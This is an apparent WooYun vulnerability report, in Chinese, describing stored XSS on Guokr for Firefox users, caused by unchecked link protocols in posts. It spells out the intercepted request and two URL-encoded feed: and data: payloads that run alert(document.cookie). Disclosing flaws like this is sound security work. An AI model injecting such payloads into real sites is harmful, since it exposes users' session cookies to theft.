WooYun.org

这个在果壳网能发帖的地方几乎都是，不过只针对firefox浏览器用户。在插入链接的时候没有严格检查A标签的协议，导致可以插入feed：，data：等标签。当然直接插是不能的，不过抓包一下，修改对应的链接就可以了。
原本的post应该是这样：content=%5Burl+href%3Dhttp%3A%2F%2Frenren.com%5Dhttp%3A%2F%2Frenren.com%5B%2Furl%5D
可以抓包后把中间的"http%3A%2F%2Frenren.com"改为"feed%3ajavascript%3a%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%76%6F%69%64%28%30%29%3B"或"data:%74%65%78%74%2F%68%74%6D%6C%2C%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%76%69%6F%64%28%30%29%3B%3C%2F%73%63%72%69%70%74%3E",发帖后firefox用户点击就悲剧了。
证明看下面。